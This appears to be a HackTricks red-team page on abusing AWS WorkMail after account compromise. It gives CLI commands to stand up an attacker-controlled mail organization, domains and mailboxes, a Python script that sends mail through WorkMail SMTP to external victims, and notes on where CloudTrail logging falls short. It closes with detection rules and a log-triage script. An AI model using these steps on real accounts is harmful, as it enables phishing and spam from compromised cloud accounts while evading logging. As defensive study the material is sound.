# AWS - WorkMail Post Exploitation

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

## Abusing WorkMail to bypass SES sandbox

Even if SES is stuck in the sandbox (verified recipients only, ~200 msgs/24h, 1 msg/s), WorkMail has no equivalent restriction. An attacker with long-term keys can set up disposable email infrastructure and start sending immediately:

1. Create a WorkMail org (region-scoped):

```bash
aws workmail create-organization --region us-east-1 --alias temp-mail --directory-id <dir-id-if-reusing>
```

2. Verify attacker-controlled domains (WorkMail invokes SES APIs as workmail.amazonaws.com):

```bash
aws ses verify-domain-identity --domain attacker-domain.com
aws ses verify-domain-dkim --domain attacker-domain.com
```

3. Provision mailbox users and register them:

```bash
aws workmail create-user --organization-id <org-id> --name marketing --display-name "Marketing"
aws workmail register-to-work-mail --organization-id <org-id> --entity-id <user-id> --email marketing@attacker-domain.com
```

Notes:

- Default recipient limit documented by AWS: 100,000 external recipients/day per org (aggregated across users).
- Domain verification activity will show up in CloudTrail under SES, but with `invokedBy: workmail.<region>.amazonaws.com`, so SES verification events may belong to a WorkMail setup rather than to SES campaigns.
- WorkMail mailbox users become application-layer persistence independent of IAM users.

## Sending paths & telemetry gaps

### Web client (WorkMail UI)

- Send actions appear as `ses:SendRawEmail` events in CloudTrail.
- `userIdentity.type = AWSService`, `invokedBy`/`sourceIPAddress`/`userAgent = workmail.<region>.amazonaws.com`, so the real client IP is hidden.
- `requestParameters` still leaks the sender (`source`, `fromArn`, `sourceArn`, configuration set), which can be correlated with newly verified domains/mailboxes.

### SMTP (stealthiest)

- Endpoint: `smtp.mail.<region>.awsapps.com:465` (SMTP over SSL) with the mailbox password.
- No CloudTrail data events are generated for SMTP delivery, even when SES data events are enabled.
- The ideal detection points are org/domain/user provisioning and the SES identity ARNs referenced in subsequent web-sent `SendRawEmail` events.
Example SMTP send via WorkMail:

```python
import smtplib
from email.message import EmailMessage

SMTP_SERVER = "smtp.mail.us-east-1.awsapps.com"
SMTP_PORT = 465
EMAIL_ADDRESS = "marketing@attacker-domain.com"
EMAIL_PASSWORD = "SuperSecretPassword!"

target = "victim@example.com"  # can be unverified/external
msg = EmailMessage()
msg["Subject"] = "WorkMail SMTP"
msg["From"] = EMAIL_ADDRESS
msg["To"] = target
msg.set_content("Delivered via WorkMail SMTP")

with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as smtp:
    smtp.login(EMAIL_ADDRESS, EMAIL_PASSWORD)
    smtp.send_message(msg)
```

## Detection considerations

- If WorkMail is not needed, block it via **SCPs** (`workmail:*` deny) at the organization level.
- Alert on provisioning: `workmail:CreateOrganization`, `workmail:CreateUser`, `workmail:RegisterToWorkMail`, and SES verifications with `invokedBy=workmail.amazonaws.com` (`ses:VerifyDomainIdentity`, `ses:VerifyDomainDkim`).
- Watch for abnormal **`ses:SendRawEmail`** events where the identity ARNs point to new domains and the source IP/UA equals `workmail.<region>.amazonaws.com`.
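Detection logic for the three signals above, as an added example that is not part of the original page: it runs over constructed CloudTrail-style records (account id, domains and user names are placeholders), keys on the event names and the `invokedBy`/`sourceArn` fields the page describes, and raises a higher-severity alert for a web-client `SendRawEmail` whose identity domain was verified through WorkMail earlier in the same log.

```python
import json

WORKMAIL_PROVISIONING = {"CreateOrganization", "CreateUser", "RegisterToWorkMail"}
SES_VERIFY = {"VerifyDomainIdentity", "VerifyDomainDkim"}

# Constructed CloudTrail-style records (one JSON object per line, not real account data),
# shaped like the events the page describes. Account id, domains and users are placeholders.
SAMPLE_LOG = """\
{"eventSource":"workmail.amazonaws.com","eventName":"CreateOrganization","userIdentity":{"type":"IAMUser","userName":"ci-deploy"}}
{"eventSource":"ses.amazonaws.com","eventName":"VerifyDomainIdentity","userIdentity":{"type":"AWSService","invokedBy":"workmail.amazonaws.com"},"requestParameters":{"domain":"attacker-domain.com"}}
{"eventSource":"ses.amazonaws.com","eventName":"SendRawEmail","userIdentity":{"type":"AWSService","invokedBy":"workmail.us-east-1.amazonaws.com"},"sourceIPAddress":"workmail.us-east-1.amazonaws.com","requestParameters":{"source":"marketing@attacker-domain.com","sourceArn":"arn:aws:ses:us-east-1:111122223333:identity/attacker-domain.com"}}
{"eventSource":"ses.amazonaws.com","eventName":"SendRawEmail","userIdentity":{"type":"IAMUser","userName":"app-mailer"},"sourceIPAddress":"203.0.113.10","requestParameters":{"source":"noreply@corp.example","sourceArn":"arn:aws:ses:us-east-1:111122223333:identity/corp.example"}}
"""

def parse_log(text):
    """Parse newline-delimited CloudTrail records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def invoked_by_workmail(ev):
    """True when the call was made by the WorkMail service principal rather than a real principal."""
    ident = ev.get("userIdentity", {})
    return ident.get("type") == "AWSService" and str(ident.get("invokedBy", "")).startswith("workmail.")

def identity_domain(ev):
    """Domain behind sourceArn (...:identity/<domain> or ...:identity/<address>)."""
    arn = ev.get("requestParameters", {}).get("sourceArn", "")
    return arn.rsplit("identity/", 1)[-1].split("@")[-1].lower()

def triage(events):
    """Single chronological pass: remember domains WorkMail verified, then score sends."""
    alerts, workmail_domains = [], set()
    for ev in events:
        src, name = ev.get("eventSource"), ev.get("eventName")
        if src == "workmail.amazonaws.com" and name in WORKMAIL_PROVISIONING:
            # SMTP sends leave no data events, so provisioning is the only hook for that path.
            alerts.append(("workmail-provisioning", name))
        elif src == "ses.amazonaws.com" and name in SES_VERIFY and invoked_by_workmail(ev):
            domain = ev.get("requestParameters", {}).get("domain", "").lower()
            workmail_domains.add(domain)
            alerts.append(("ses-verify-via-workmail", domain))
        elif src == "ses.amazonaws.com" and name == "SendRawEmail" and invoked_by_workmail(ev):
            # Web-client sends: the client IP is masked, but sourceArn still names the identity.
            domain = identity_domain(ev)
            severity = "high" if domain in workmail_domains else "medium"
            alerts.append(("workmail-web-send", f"{severity}:{domain}"))
    return alerts

if __name__ == "__main__":
    for kind, detail in triage(parse_log(SAMPLE_LOG)):
        print(kind, detail)
```

The fourth record (a normal IAM-user `SendRawEmail` from a public IP) produces no alert, which is the point of keying on the service principal rather than on the event name alone.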

## References

- [Threat Actors Using AWS WorkMail in Phishing Campaigns](https://www.rapid7.com/blog/post/dr-threat-actors-aws-workmail-phishing-campaigns)
- [AWS WorkMail limits](https://docs.aws.amazon.com/workmail/latest/adminguide/limits.html)
